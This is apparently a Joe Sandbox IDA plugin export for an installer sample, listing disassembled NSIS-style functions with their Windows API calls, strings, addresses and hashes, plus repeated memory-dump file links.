Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Section: "%s", xrefs: 00405079
Skipping section: "%s", xrefs: 004050B5

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

